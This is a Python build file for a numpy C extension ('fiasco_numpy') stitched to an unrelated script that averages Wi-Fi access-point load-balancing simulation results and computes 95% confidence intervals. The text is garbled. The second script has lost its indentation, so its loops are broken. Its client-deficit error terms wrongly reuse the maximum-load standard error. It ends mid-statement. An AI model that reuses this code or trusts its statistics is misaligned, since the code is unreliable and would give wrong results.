# Build the _fiasco_numpy extension from the C sources plus the wrapper,
# applying the flags parsed from CFLAGS/LFLAGS above.
# NOTE(review): fiasco_numpy_wrap.c looks like generated wrapper code --
# confirm it is regenerated whenever the interface changes.
setup(name="fiasco_numpy",
      version='1.0',
      py_modules=['fiasco_numpy'],
      ext_modules=[Extension('_fiasco_numpy',
                             ['glm.c','glm_irls.c',
                              'optimizer.c','interpolator.c',
                              'kalmanfilter.c',
                              'fiasco_numpy_wrap.c'],
                             define_macros=defList,
                             undef_macros=undefList,
                             include_dirs=incDirList,
                             extra_compile_args=otherCompileFlags,
                             library_dirs=libDirList,
                             libraries=libList,
                             extra_link_args=otherLinkFlags
                             )
                   ],
      description='Python numpy interface for Fiasco/FIAT libs',
      author='Joel Welling',
      author_email='welling@psc.edu',
      url='http://www.stat.cmu.edu/~fiasco',
      )
|
import sys
import math
from collections import defaultdict
import numpy as np
# Input file holding the raw per-run summary results parsed below.
LOG_PATH_random="summary_results.txt"
# One output data file per plotted metric.
POUR_PLOT_deficit="plot_deficit"
POUR_PLOT_throughput="plot_throughput"
POUR_PLOT_APs_std_load="plot_APs_std_load"
POUR_PLOT_APs_maximum_load="plot_APs_maximum_load"
POUR_PLOT_clients_Nb_deficit="plot_clients_Nb_deficit"
POUR_PLOT_deficit_classes="plot_deficit_classes"
POUR_PLOT_throughput_classes="plot_throughput_classes"
POUR_PLOT_clients_Nb_deficit_class="plot_clients_Nb_deficit_classes"
# NOTE(review): these module-level handles stay open for the whole run;
# presumably closed further down or left to interpreter exit -- confirm.
f_Q_priority=open(LOG_PATH_random,"r")
g_deficit=open(POUR_PLOT_deficit,"w")
g_throughput=open(POUR_PLOT_throughput,"w")
g_APs_std_load=open(POUR_PLOT_APs_std_load,"w")
g_APs_maximum_load=open(POUR_PLOT_APs_maximum_load,"w")
g_clients_Nb_deficit=open(POUR_PLOT_clients_Nb_deficit,"w")
g_PLOT_deficit_classes=open(POUR_PLOT_deficit_classes,"w")
g_throughput_classes=open(POUR_PLOT_throughput_classes,"w")
g_clients_Nb_deficit_class=open(POUR_PLOT_clients_Nb_deficit_class,"w")
nb_repetition=10    # repetitions averaged per node density
priority_class=4    # number of priority classes per run
for density_nodes in range(1,21): #case random, jusqu'a density=40 noeuds
#for density_nodes in range(1,7): #case random, jusqu'a density=30 noeuds
#for density_nodes in range(1,2):
moy_deficit_priority=0
moy_throughput_priority=0
moy_std_load_priority=0
moy_maximum_load_priority=0
moy_clients_deficit_priority=0
erreur_deficit_priority=0
erreur_throughput_priority=0
erreur_std_load_priority=0
erreur_maximum_load_priority=0
erreur_clients_deficit_priority=0
moy_deficit_RSSI=0
moy_throughput_RSSI=0
moy_std_load_RSSI=0
moy_maximum_load_RSSI=0
moy_clients_deficit_RSSI=0
erreur_deficit_RSSI=0
erreur_throughput_RSSI=0
erreur_std_load_RSSI=0
erreur_maximum_load_RSSI=0
erreur_clients_deficit_RSSI=0
moy_deficit_FF=0
moy_throughput_FF=0
moy_std_load_FF=0
moy_maximum_load_FF=0
moy_clients_deficit_FF=0
erreur_deficit_FF=0
erreur_throughput_FF=0
erreur_std_load_FF=0
erreur_maximum_load_FF=0
erreur_clients_deficit_FF=0
moy_deficit_LL=0
moy_throughput_LL=0
moy_std_load_LL=0
moy_maximum_load_LL=0
moy_clients_deficit_LL=0
erreur_deficit_LL=0
erreur_throughput_LL=0
erreur_std_load_LL=0
erreur_maximum_load_LL=0
erreur_clients_deficit_LL=0
moy_deficit_classes=defaultdict() #c[i][j]=48
moy_throughput_classes=defaultdict()
moy_clients_deficit_classes=defaultdict()
erreur_deficit_classes=defaultdict() #c[i][j]=48
erreur_throughput_classes=defaultdict()
erreur_clients_deficit_classes=defaultdict()
moy_deficit_RSSI_classes=defaultdict() #c[i][j]=48
moy_throughput_RSSI_classes=defaultdict()
moy_clients_deficit_RSSI_classes=defaultdict()
erreur_deficit_RSSI_classes=defaultdict() #c[i][j]=48
erreur_throughput_RSSI_classes=defaultdict()
erreur_clients_deficit_RSSI_classes=defaultdict()
moy_deficit_FF_classes=defaultdict() #c[i][j]=48
moy_throughput_FF_classes=defaultdict()
moy_clients_deficit_FF_classes=defaultdict()
erreur_deficit_FF_classes=defaultdict() #c[i][j]=48
erreur_throughput_FF_classes=defaultdict()
erreur_clients_deficit_FF_classes=defaultdict()
moy_deficit_LL_classes=defaultdict() #c[i][j]=48
moy_throughput_LL_classes=defaultdict()
moy_clients_deficit_LL_classes=defaultdict()
erreur_deficit_LL_classes=defaultdict() #c[i][j]=48
erreur_throughput_LL_classes=defaultdict()
erreur_clients_deficit_LL_classes=defaultdict()
for cla in range(0,priority_class):
moy_deficit_classes[cla]=0
moy_throughput_classes[cla]=0
moy_clients_deficit_classes[cla]=0
erreur_deficit_classes[cla]=0
erreur_throughput_classes[cla]=0
erreur_clients_deficit_classes[cla]=0
moy_deficit_RSSI_classes[cla]=0
moy_throughput_RSSI_classes[cla]=0
moy_clients_deficit_RSSI_classes[cla]=0
erreur_deficit_RSSI_classes[cla]=0
erreur_throughput_RSSI_classes[cla]=0
erreur_clients_deficit_RSSI_classes[cla]=0
moy_deficit_FF_classes[cla]=0
moy_throughput_FF_classes[cla]=0
moy_clients_deficit_FF_classes[cla]=0
erreur_deficit_FF_classes[cla]=0
erreur_throughput_FF_classes[cla]=0
erreur_clients_deficit_FF_classes[cla]=0
moy_deficit_LL_classes[cla]=0
moy_throughput_LL_classes[cla]=0
moy_clients_deficit_LL_classes[cla]=0
erreur_deficit_LL_classes[cla]=0
erreur_throughput_LL_classes[cla]=0
erreur_clients_deficit_LL_classes[cla]=0
val_deficit_priority={}
val_throughput_priority={}
val_std_load_priority={}
val_maximum_load_priority={}
val_clients_deficit_priority={}
val_deficit_RSSI={}
val_throughput_RSSI={}
val_std_load_RSSI={}
val_maximum_load_RSSI={}
val_clients_deficit_RSSI={}
val_deficit_FF={}
val_throughput_FF={}
val_std_load_FF={}
val_maximum_load_FF={}
val_clients_deficit_FF={}
val_deficit_LL={}
val_throughput_LL={}
val_std_load_LL={}
val_maximum_load_LL={}
val_clients_deficit_LL={}
val_deficit_classes={}
val_throughput_classes={}
val_clients_deficit_classes={}
val_deficit_classes_RSSI={}
val_throughput_classes_RSSI={}
val_clients_deficit_classes_RSSI={}
val_deficit_classes_FF={}
val_throughput_classes_FF={}
val_clients_deficit_classes_FF={}
val_deficit_classes_LL={}
val_throughput_classes_LL={}
val_clients_deficit_classes_LL={}
for cla in range(0,priority_class):
val_deficit_classes[cla]={}
val_throughput_classes[cla]={}
val_clients_deficit_classes[cla]={}
val_deficit_classes_RSSI[cla]={}
val_throughput_classes_RSSI[cla]={}
val_clients_deficit_classes_RSSI[cla]={}
val_deficit_classes_FF[cla]={}
val_throughput_classes_FF[cla]={}
val_clients_deficit_classes_FF[cla]={}
val_deficit_classes_LL[cla]={}
val_throughput_classes_LL[cla]={}
val_clients_deficit_classes_LL[cla]={}
for repetition in range(0,nb_repetition):
line_den_case_repet=f_Q_priority.readline()
line_deficit=f_Q_priority.readline()
line_throughput=f_Q_priority.readline()
line_std_load=f_Q_priority.readline()
line_maximum_load=f_Q_priority.readline()
line_clients_deficit=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
line_deficit_classes={}
for cla in range(0,priority_class):
line_deficit_classes[cla]=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
line_throughput_classes={}
for cla in range(0,priority_class):
line_throughput_classes[cla]=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
line_nb_deficit_classes={}
for cla in range(0,priority_class):
line_nb_deficit_classes[cla]=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
analyse_deficit=line_deficit.strip().split()
analyse_throughput=line_throughput.strip().split()
analyse_std_load=line_std_load.strip().split()
analyse_maximum_load=line_maximum_load.strip().split()
analyse_clients_deficit=line_clients_deficit.strip().split()
analyse_deficit_classes={}
analyse_throughput_classes={}
analyse_clients_deficit_classes={}
for cla in range(0,priority_class):
analyse_deficit_classes[cla]=line_deficit_classes[cla].strip().split()
analyse_throughput_classes[cla]=line_throughput_classes[cla].strip().split()
analyse_clients_deficit_classes[cla]=line_nb_deficit_classes[cla].strip().split()
val_deficit_priority[repetition]=float(analyse_deficit[2])
val_throughput_priority[repetition]=float(analyse_throughput[2])
val_std_load_priority[repetition]=float(analyse_std_load[4])
val_maximum_load_priority[repetition]=float(analyse_maximum_load[4])
val_clients_deficit_priority[repetition]=float(analyse_clients_deficit[5])
val_deficit_RSSI[repetition]=float(analyse_deficit[3])
val_throughput_RSSI[repetition]=float(analyse_throughput[3])
val_std_load_RSSI[repetition]=float(analyse_std_load[5])
val_maximum_load_RSSI[repetition]=float(analyse_maximum_load[5])
val_clients_deficit_RSSI[repetition]=float(analyse_clients_deficit[6])
val_deficit_FF[repetition]=float(analyse_deficit[4])
val_throughput_FF[repetition]=float(analyse_throughput[4])
val_std_load_FF[repetition]=float(analyse_std_load[6])
val_maximum_load_FF[repetition]=float(analyse_maximum_load[6])
val_clients_deficit_FF[repetition]=float(analyse_clients_deficit[7])
val_deficit_LL[repetition]=float(analyse_deficit[5])
val_throughput_LL[repetition]=float(analyse_throughput[5])
val_std_load_LL[repetition]=float(analyse_std_load[7])
val_maximum_load_LL[repetition]=float(analyse_maximum_load[7])
val_clients_deficit_LL[repetition]=float(analyse_clients_deficit[8])
for cla in range(0,priority_class):
val_deficit_classes[cla][repetition]=float(analyse_deficit_classes[cla][4])
val_throughput_classes[cla][repetition]=float(analyse_throughput_classes[cla][4])
val_clients_deficit_classes[cla][repetition]=float(analyse_clients_deficit_classes[cla][6])
val_deficit_classes_RSSI[cla][repetition]=float(analyse_deficit_classes[cla][5])
val_throughput_classes_RSSI[cla][repetition]=float(analyse_throughput_classes[cla][5])
val_clients_deficit_classes_RSSI[cla][repetition]=float(analyse_clients_deficit_classes[cla][7])
val_deficit_classes_FF[cla][repetition]=float(analyse_deficit_classes[cla][6])
val_throughput_classes_FF[cla][repetition]=float(analyse_throughput_classes[cla][6])
val_clients_deficit_classes_FF[cla][repetition]=float(analyse_clients_deficit_classes[cla][8])
val_deficit_classes_LL[cla][repetition]=float(analyse_deficit_classes[cla][7])
val_throughput_classes_LL[cla][repetition]=float(analyse_throughput_classes[cla][7])
val_clients_deficit_classes_LL[cla][repetition]=float(analyse_clients_deficit_classes[cla][9])
moy_deficit_priority=moy_deficit_priority+val_deficit_priority[repetition]
moy_throughput_priority=moy_throughput_priority+val_throughput_priority[repetition]
moy_std_load_priority=moy_std_load_priority+val_std_load_priority[repetition]
moy_maximum_load_priority=moy_maximum_load_priority+val_maximum_load_priority[repetition]
moy_clients_deficit_priority=moy_clients_deficit_priority+val_clients_deficit_priority[repetition]
moy_deficit_RSSI=moy_deficit_RSSI+val_deficit_RSSI[repetition]
moy_throughput_RSSI=moy_throughput_RSSI+val_throughput_RSSI[repetition]
moy_std_load_RSSI=moy_std_load_RSSI+val_std_load_RSSI[repetition]
moy_maximum_load_RSSI=moy_maximum_load_RSSI+val_maximum_load_RSSI[repetition]
moy_clients_deficit_RSSI=moy_clients_deficit_RSSI+val_clients_deficit_RSSI[repetition]
moy_deficit_FF=moy_deficit_FF+val_deficit_FF[repetition]
moy_throughput_FF=moy_throughput_FF+val_throughput_FF[repetition]
moy_std_load_FF=moy_std_load_FF+val_std_load_FF[repetition]
moy_maximum_load_FF=moy_maximum_load_FF+val_maximum_load_FF[repetition]
moy_clients_deficit_FF=moy_clients_deficit_FF+val_clients_deficit_FF[repetition]
moy_deficit_LL=moy_deficit_LL+val_deficit_LL[repetition]
moy_throughput_LL=moy_throughput_LL+val_throughput_LL[repetition]
moy_std_load_LL=moy_std_load_LL+val_std_load_LL[repetition]
moy_maximum_load_LL=moy_maximum_load_LL+val_maximum_load_LL[repetition]
moy_clients_deficit_LL=moy_clients_deficit_LL+val_clients_deficit_LL[repetition]
for cla in range(0,priority_class):
moy_deficit_classes[cla]=moy_deficit_classes[cla]+val_deficit_classes[cla][repetition]
moy_throughput_classes[cla]=moy_throughput_classes[cla]+val_throughput_classes[cla][repetition]
moy_clients_deficit_classes[cla]=moy_clients_deficit_classes[cla]+val_clients_deficit_classes[cla][repetition]
moy_deficit_RSSI_classes[cla]=moy_deficit_RSSI_classes[cla]+val_deficit_classes_RSSI[cla][repetition]
moy_throughput_RSSI_classes[cla]=moy_throughput_RSSI_classes[cla]+val_throughput_classes_RSSI[cla][repetition]
moy_clients_deficit_RSSI_classes[cla]=moy_clients_deficit_RSSI_classes[cla]+val_clients_deficit_classes_RSSI[cla][repetition]
moy_deficit_FF_classes[cla]=moy_deficit_FF_classes[cla]+val_deficit_classes_FF[cla][repetition]
moy_throughput_FF_classes[cla]=moy_throughput_FF_classes[cla]+val_throughput_classes_FF[cla][repetition]
moy_clients_deficit_FF_classes[cla]=moy_clients_deficit_FF_classes[cla]+val_clients_deficit_classes_FF[cla][repetition]
moy_deficit_LL_classes[cla]=moy_deficit_LL_classes[cla]+val_deficit_classes_LL[cla][repetition]
moy_throughput_LL_classes[cla]=moy_throughput_LL_classes[cla]+val_throughput_classes_LL[cla][repetition]
moy_clients_deficit_LL_classes[cla]=moy_clients_deficit_LL_classes[cla]+val_clients_deficit_classes_LL[cla][repetition]
if repetition==nb_repetition-1:
moy_deficit_priority=float(moy_deficit_priority)/nb_repetition
moy_throughput_priority=float(moy_throughput_priority)/nb_repetition
moy_std_load_priority=float(moy_std_load_priority)/nb_repetition
moy_maximum_load_priority=float(moy_maximum_load_priority)/nb_repetition
moy_clients_deficit_priority=float(moy_clients_deficit_priority)/nb_repetition
moy_deficit_RSSI=float(moy_deficit_RSSI)/nb_repetition
moy_throughput_RSSI=float(moy_throughput_RSSI)/nb_repetition
moy_std_load_RSSI=float(moy_std_load_RSSI)/nb_repetition
moy_maximum_load_RSSI=float(moy_maximum_load_RSSI)/nb_repetition
moy_clients_deficit_RSSI=float(moy_clients_deficit_RSSI)/nb_repetition
moy_deficit_FF=float(moy_deficit_FF)/nb_repetition
moy_throughput_FF=float(moy_throughput_FF)/nb_repetition
moy_std_load_FF=float(moy_std_load_FF)/nb_repetition
moy_maximum_load_FF=float(moy_maximum_load_FF)/nb_repetition
moy_clients_deficit_FF=float(moy_clients_deficit_FF)/nb_repetition
moy_deficit_LL=float(moy_deficit_LL)/nb_repetition
moy_throughput_LL=float(moy_throughput_LL)/nb_repetition
moy_std_load_LL=float(moy_std_load_LL)/nb_repetition
moy_maximum_load_LL=float(moy_maximum_load_LL)/nb_repetition
moy_clients_deficit_LL=float(moy_clients_deficit_LL)/nb_repetition
for cla in range(0,priority_class):
moy_deficit_classes[cla]=float(moy_deficit_classes[cla])/nb_repetition
moy_throughput_classes[cla]=float(moy_throughput_classes[cla])/nb_repetition
moy_clients_deficit_classes[cla]=float(moy_clients_deficit_classes[cla])/nb_repetition
moy_deficit_RSSI_classes[cla]=float(moy_deficit_RSSI_classes[cla])/nb_repetition
moy_throughput_RSSI_classes[cla]=float(moy_throughput_RSSI_classes[cla])/nb_repetition
moy_clients_deficit_RSSI_classes[cla]=float(moy_clients_deficit_RSSI_classes[cla])/nb_repetition
moy_deficit_FF_classes[cla]=float(moy_deficit_FF_classes[cla])/nb_repetition
moy_throughput_FF_classes[cla]=float(moy_throughput_FF_classes[cla])/nb_repetition
moy_clients_deficit_FF_classes[cla]=float(moy_clients_deficit_FF_classes[cla])/nb_repetition
moy_deficit_LL_classes[cla]=float(moy_deficit_LL_classes[cla])/nb_repetition
moy_throughput_LL_classes[cla]=float(moy_throughput_LL_classes[cla])/nb_repetition
moy_clients_deficit_LL_classes[cla]=float(moy_clients_deficit_LL_classes[cla])/nb_repetition
SN_deficit_priority=0
SN_throughput_priority=0
SN_std_load_priority=0
SN_maximum_load_priority=0
SN_clients_deficit_priority=0
SE_deficit_priority=0
SE_throughput_priority=0
SE_std_load_priority=0
SE_maximum_load_priority=0
SE_clients_deficit_priority=0
SN_deficit_RSSI=0
SN_throughput_RSSI=0
SN_std_load_RSSI=0
SN_maximum_load_RSSI=0
SN_clients_deficit_RSSI=0
SE_deficit_RSSI=0
SE_throughput_RSSI=0
SE_std_load_RSSI=0
SE_maximum_load_RSSI=0
SE_clients_deficit_RSSI=0
SN_deficit_FF=0
SN_throughput_FF=0
SN_std_load_FF=0
SN_maximum_load_FF=0
SN_clients_deficit_FF=0
SE_deficit_FF=0
SE_throughput_FF=0
SE_std_load_FF=0
SE_maximum_load_FF=0
SE_clients_deficit_FF=0
SN_deficit_LL=0
SN_throughput_LL=0
SN_std_load_LL=0
SN_maximum_load_LL=0
SN_clients_deficit_LL=0
SE_deficit_LL=0
SE_throughput_LL=0
SE_std_load_LL=0
SE_maximum_load_LL=0
SE_clients_deficit_LL=0
SN_deficit_priority_classes={}
SN_throughput_priority_classes={}
SN_clients_deficit_priority_classes={}
SE_deficit_priority_classes={}
SE_throughput_priority_classes={}
SE_clients_deficit_priority_classes={}
SN_deficit_RSSI_classes={}
SN_throughput_RSSI_classes={}
SN_clients_deficit_RSSI_classes={}
SE_deficit_RSSI_classes={}
SE_throughput_RSSI_classes={}
SE_clients_deficit_RSSI_classes={}
SN_deficit_FF_classes={}
SN_throughput_FF_classes={}
SN_clients_deficit_FF_classes={}
SE_deficit_FF_classes={}
SE_throughput_FF_classes={}
SE_clients_deficit_FF_classes={}
SN_deficit_LL_classes={}
SN_throughput_LL_classes={}
SN_clients_deficit_LL_classes={}
SE_deficit_LL_classes={}
SE_throughput_LL_classes={}
SE_clients_deficit_LL_classes={}
for cla in range(0,priority_class):
SN_deficit_priority_classes[cla]=0
SN_throughput_priority_classes[cla]=0
SN_clients_deficit_priority_classes[cla]=0
SE_deficit_priority_classes[cla]=0
SE_throughput_priority_classes[cla]=0
SE_clients_deficit_priority_classes[cla]=0
SN_deficit_RSSI_classes[cla]=0
SN_throughput_RSSI_classes[cla]=0
SN_clients_deficit_RSSI_classes[cla]=0
SE_deficit_RSSI_classes[cla]=0
SE_throughput_RSSI_classes[cla]=0
SE_clients_deficit_RSSI_classes[cla]=0
SN_deficit_FF_classes[cla]=0
SN_throughput_FF_classes[cla]=0
SN_clients_deficit_FF_classes[cla]=0
SE_deficit_FF_classes[cla]=0
SE_throughput_FF_classes[cla]=0
SE_clients_deficit_FF_classes[cla]=0
SN_deficit_LL_classes[cla]=0
SN_throughput_LL_classes[cla]=0
SN_clients_deficit_LL_classes[cla]=0
SE_deficit_LL_classes[cla]=0
SE_throughput_LL_classes[cla]=0
SE_clients_deficit_LL_classes[cla]=0
for i in range (0,nb_repetition):
SN_deficit_priority=SN_deficit_priority+(val_deficit_priority[i]-moy_deficit_priority)**2
SN_throughput_priority=SN_throughput_priority+(val_throughput_priority[i]-moy_throughput_priority)**2
SN_std_load_priority=SN_std_load_priority+(val_std_load_priority[i]-moy_std_load_priority)**2
SN_maximum_load_priority=SN_maximum_load_priority+(val_maximum_load_priority[i]-moy_maximum_load_priority)**2
SN_clients_deficit_priority=SN_clients_deficit_priority+(val_clients_deficit_priority[i]-moy_clients_deficit_priority)**2
SN_deficit_RSSI=SN_deficit_RSSI+(val_deficit_RSSI[i]-moy_deficit_RSSI)**2
SN_throughput_RSSI=SN_throughput_RSSI+(val_throughput_RSSI[i]-moy_throughput_RSSI)**2
SN_std_load_RSSI=SN_std_load_RSSI+(val_std_load_RSSI[i]-moy_std_load_RSSI)**2
SN_maximum_load_RSSI=SN_maximum_load_RSSI+(val_maximum_load_RSSI[i]-moy_maximum_load_RSSI)**2
SN_clients_deficit_RSSI=SN_clients_deficit_RSSI+(val_clients_deficit_RSSI[i]-moy_clients_deficit_RSSI)**2
SN_deficit_FF=SN_deficit_FF+(val_deficit_FF[i]-moy_deficit_FF)**2
SN_throughput_FF=SN_throughput_FF+(val_throughput_FF[i]-moy_throughput_FF)**2
SN_std_load_FF=SN_std_load_FF+(val_std_load_FF[i]-moy_std_load_FF)**2
SN_maximum_load_FF=SN_maximum_load_FF+(val_maximum_load_FF[i]-moy_maximum_load_FF)**2
SN_clients_deficit_FF=SN_clients_deficit_FF+(val_clients_deficit_FF[i]-moy_clients_deficit_FF)**2
SN_deficit_LL=SN_deficit_LL+(val_deficit_LL[i]-moy_deficit_LL)**2
SN_throughput_LL=SN_throughput_LL+(val_throughput_LL[i]-moy_throughput_LL)**2
SN_std_load_LL=SN_std_load_LL+(val_std_load_LL[i]-moy_std_load_LL)**2
SN_maximum_load_LL=SN_maximum_load_LL+(val_maximum_load_LL[i]-moy_maximum_load_LL)**2
SN_clients_deficit_LL=SN_clients_deficit_LL+(val_clients_deficit_LL[i]-moy_clients_deficit_LL)**2
for cla in range(0,priority_class):
SN_deficit_priority_classes[cla]=SN_deficit_priority_classes[cla]+(val_deficit_classes[cla][i]-moy_deficit_classes[cla])**2
SN_throughput_priority_classes[cla]=SN_throughput_priority_classes[cla]+(val_throughput_classes[cla][i]-moy_throughput_classes[cla])**2
SN_clients_deficit_priority_classes[cla]=SN_clients_deficit_priority_classes[cla]+ (val_clients_deficit_classes[cla][i]-moy_clients_deficit_classes[cla])**2
SN_deficit_RSSI_classes[cla]=SN_deficit_RSSI_classes[cla]+(val_deficit_classes_RSSI[cla][i]-moy_deficit_RSSI_classes[cla])**2
SN_throughput_RSSI_classes[cla]=SN_throughput_RSSI_classes[cla]+(val_throughput_classes_RSSI[cla][i]-moy_throughput_RSSI_classes[cla])**2
SN_clients_deficit_RSSI_classes[cla]=SN_clients_deficit_RSSI_classes[cla]+(val_clients_deficit_classes_RSSI[cla][i]-moy_clients_deficit_RSSI_classes[cla])**2
SN_deficit_FF_classes[cla]=SN_deficit_FF_classes[cla]+(val_deficit_classes_FF[cla][i]-moy_deficit_FF_classes[cla])**2
SN_throughput_FF_classes[cla]=SN_throughput_FF_classes[cla]+(val_throughput_classes_FF[cla][i]-moy_throughput_FF_classes[cla])**2
SN_clients_deficit_FF_classes[cla]=SN_clients_deficit_FF_classes[cla]+(val_clients_deficit_classes_FF[cla][i]-moy_clients_deficit_FF_classes[cla])**2
SN_deficit_LL_classes[cla]=SN_deficit_LL_classes[cla]+(val_deficit_classes_LL[cla][i]-moy_deficit_LL_classes[cla])**2
SN_throughput_LL_classes[cla]=SN_throughput_LL_classes[cla]+(val_throughput_classes_LL[cla][i]-moy_throughput_LL_classes[cla])**2
SN_clients_deficit_LL_classes[cla]=SN_clients_deficit_LL_classes[cla]+(val_clients_deficit_classes_LL[cla][i]-moy_clients_deficit_LL_classes[cla])**2
SN_deficit_priority=math.sqrt(SN_deficit_priority/nb_repetition)
SN_throughput_priority=math.sqrt(SN_throughput_priority/nb_repetition)
SN_std_load_priority=math.sqrt(SN_std_load_priority/nb_repetition)
SN_maximum_load_priority=math.sqrt(SN_maximum_load_priority/nb_repetition)
SN_clients_deficit_priority=math.sqrt(SN_clients_deficit_priority/nb_repetition)
SE_deficit_priority=SN_deficit_priority/math.sqrt(nb_repetition)
SE_throughput_priority=SN_throughput_priority/math.sqrt(nb_repetition)
SE_std_load_priority=SN_std_load_priority/math.sqrt(nb_repetition)
SE_maximum_load_priority=SN_maximum_load_priority/math.sqrt(nb_repetition)
SE_clients_deficit_priority=SN_clients_deficit_priority/math.sqrt(nb_repetition)
SN_deficit_RSSI=math.sqrt(SN_deficit_RSSI/nb_repetition)
SN_throughput_RSSI=math.sqrt(SN_throughput_RSSI/nb_repetition)
SN_std_load_RSSI=math.sqrt(SN_std_load_RSSI/nb_repetition)
SN_maximum_load_RSSI=math.sqrt(SN_maximum_load_RSSI/nb_repetition)
SN_clients_deficit_RSSI=math.sqrt(SN_clients_deficit_RSSI/nb_repetition)
SE_deficit_RSSI=SN_deficit_RSSI/math.sqrt(nb_repetition)
SE_throughput_RSSI=SN_throughput_RSSI/math.sqrt(nb_repetition)
SE_std_load_RSSI=SN_std_load_RSSI/math.sqrt(nb_repetition)
SE_maximum_load_RSSI=SN_maximum_load_RSSI/math.sqrt(nb_repetition)
SE_clients_deficit_RSSI=SN_clients_deficit_RSSI/math.sqrt(nb_repetition)
SN_deficit_FF=math.sqrt(SN_deficit_FF/nb_repetition)
SN_throughput_FF=math.sqrt(SN_throughput_FF/nb_repetition)
SN_std_load_FF=math.sqrt(SN_std_load_FF/nb_repetition)
SN_maximum_load_FF=math.sqrt(SN_maximum_load_FF/nb_repetition)
SN_clients_deficit_FF=math.sqrt(SN_clients_deficit_FF/nb_repetition)
SE_deficit_FF=SN_deficit_FF/math.sqrt(nb_repetition)
SE_throughput_FF=SN_throughput_FF/math.sqrt(nb_repetition)
SE_std_load_FF=SN_std_load_FF/math.sqrt(nb_repetition)
SE_maximum_load_FF=SN_maximum_load_FF/math.sqrt(nb_repetition)
SE_clients_deficit_FF=SN_clients_deficit_FF/math.sqrt(nb_repetition)
SN_deficit_LL=math.sqrt(SN_deficit_LL/nb_repetition)
SN_throughput_LL=math.sqrt(SN_throughput_LL/nb_repetition)
SN_std_load_LL=math.sqrt(SN_std_load_LL/nb_repetition)
SN_maximum_load_LL=math.sqrt(SN_maximum_load_LL/nb_repetition)
SN_clients_deficit_LL=math.sqrt(SN_clients_deficit_LL/nb_repetition)
SE_deficit_LL=SN_deficit_LL/math.sqrt(nb_repetition)
SE_throughput_LL=SN_throughput_LL/math.sqrt(nb_repetition)
SE_std_load_LL=SN_std_load_LL/math.sqrt(nb_repetition)
SE_maximum_load_LL=SN_maximum_load_LL/math.sqrt(nb_repetition)
SE_clients_deficit_LL=SN_clients_deficit_LL/math.sqrt(nb_repetition)
SE_deficit_priority_classes={}
SE_throughput_priority_classes={}
SE_clients_deficit_priority_classes={}
SE_deficit_RSSI_classes={}
SE_throughput_RSSI_classes={}
SE_clients_deficit_RSSI_classes={}
SE_deficit_FF_classes={}
SE_throughput_FF_classes={}
SE_clients_deficit_FF_classes={}
SE_deficit_LL_classes={}
SE_throughput_LL_classes={}
SE_clients_deficit_LL_classes={}
for cla in range(0,priority_class):
SN_deficit_priority_classes[cla]=math.sqrt(SN_deficit_priority_classes[cla]/nb_repetition)
SN_throughput_priority_classes[cla]=math.sqrt(SN_throughput_priority_classes[cla]/nb_repetition)
SN_clients_deficit_priority_classes[cla]=math.sqrt(SN_clients_deficit_priority_classes[cla]/nb_repetition)
SE_deficit_priority_classes[cla]=SN_deficit_priority_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_priority_classes[cla]=SN_throughput_priority_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_priority_classes[cla]=SN_clients_deficit_priority_classes[cla]/math.sqrt(nb_repetition)
SN_deficit_RSSI_classes[cla]=math.sqrt(SN_deficit_RSSI_classes[cla]/nb_repetition)
SN_throughput_RSSI_classes[cla]=math.sqrt(SN_throughput_RSSI_classes[cla]/nb_repetition)
SN_clients_deficit_RSSI_classes[cla]=math.sqrt(SN_clients_deficit_RSSI_classes[cla]/nb_repetition)
SE_deficit_RSSI_classes[cla]=SN_deficit_RSSI_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_RSSI_classes[cla]=SN_throughput_RSSI_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_RSSI_classes[cla]=SN_clients_deficit_RSSI_classes[cla]/math.sqrt(nb_repetition)
SN_deficit_FF_classes[cla]=math.sqrt(SN_deficit_FF_classes[cla]/nb_repetition)
SN_throughput_FF_classes[cla]=math.sqrt(SN_throughput_FF_classes[cla]/nb_repetition)
SN_clients_deficit_FF_classes[cla]=math.sqrt(SN_clients_deficit_FF_classes[cla]/nb_repetition)
SE_deficit_FF_classes[cla]=SN_deficit_FF_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_FF_classes[cla]=SN_throughput_FF_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_FF_classes[cla]=SN_clients_deficit_FF_classes[cla]/math.sqrt(nb_repetition)
SN_deficit_LL_classes[cla]=math.sqrt(SN_deficit_LL_classes[cla]/nb_repetition)
SN_throughput_LL_classes[cla]=math.sqrt(SN_throughput_LL_classes[cla]/nb_repetition)
SN_clients_deficit_LL_classes[cla]=math.sqrt(SN_clients_deficit_LL_classes[cla]/nb_repetition)
SE_deficit_LL_classes[cla]=SN_deficit_LL_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_LL_classes[cla]=SN_throughput_LL_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_LL_classes[cla]=SN_clients_deficit_LL_classes[cla]/math.sqrt(nb_repetition)
###################la valeur de 1.96 correspond a un interval de confiance ce 95%####################
erreur_deficit_priority=SE_deficit_priority* 1.96
erreur_throughput_priority=SE_throughput_priority* 1.96
erreur_std_load_priority=SE_std_load_priority* 1.96
erreur_maximum_load_priority=SE_maximum_load_priority* 1.96
erreur_clients_deficit_priority=SE_maximum_load_priority* 1.96
erreur_deficit_RSSI=SE_deficit_RSSI* 1.96
erreur_throughput_RSSI=SE_throughput_RSSI* 1.96
erreur_std_load_RSSI=SE_std_load_RSSI* 1.96
erreur_maximum_load_RSSI=SE_maximum_load_RSSI* 1.96
erreur_clients_deficit_RSSI=SE_maximum_load_RSSI* 1.96
erreur_deficit_FF=SE_deficit_FF* 1.96
erreur_throughput_FF=SE_throughput_FF* 1.96
erreur_std_load_FF=SE_std_load_FF* 1.96
erreur_maximum_load_FF=SE_maximum_load_FF* 1.96
erreur_clients_deficit_FF=SE_maximum_load_FF* 1.96
erreur_deficit_LL=SE_deficit_LL* 1.96
erreur_throughput_LL=SE_throughput_LL* 1.96
erreur_std_load_LL=SE_std_load_LL* 1.96
erreur_maximum_load_LL=SE_maximum_load_LL* 1.96
erreur_clients_deficit_LL=SE_maximum_load_LL* 1.96
erreur_deficit_priority_classes={}
erreur_throughput_priority_classes={}
erreur_clients_deficit_priority_classes={}
erreur_deficit_RSSI_classes={}
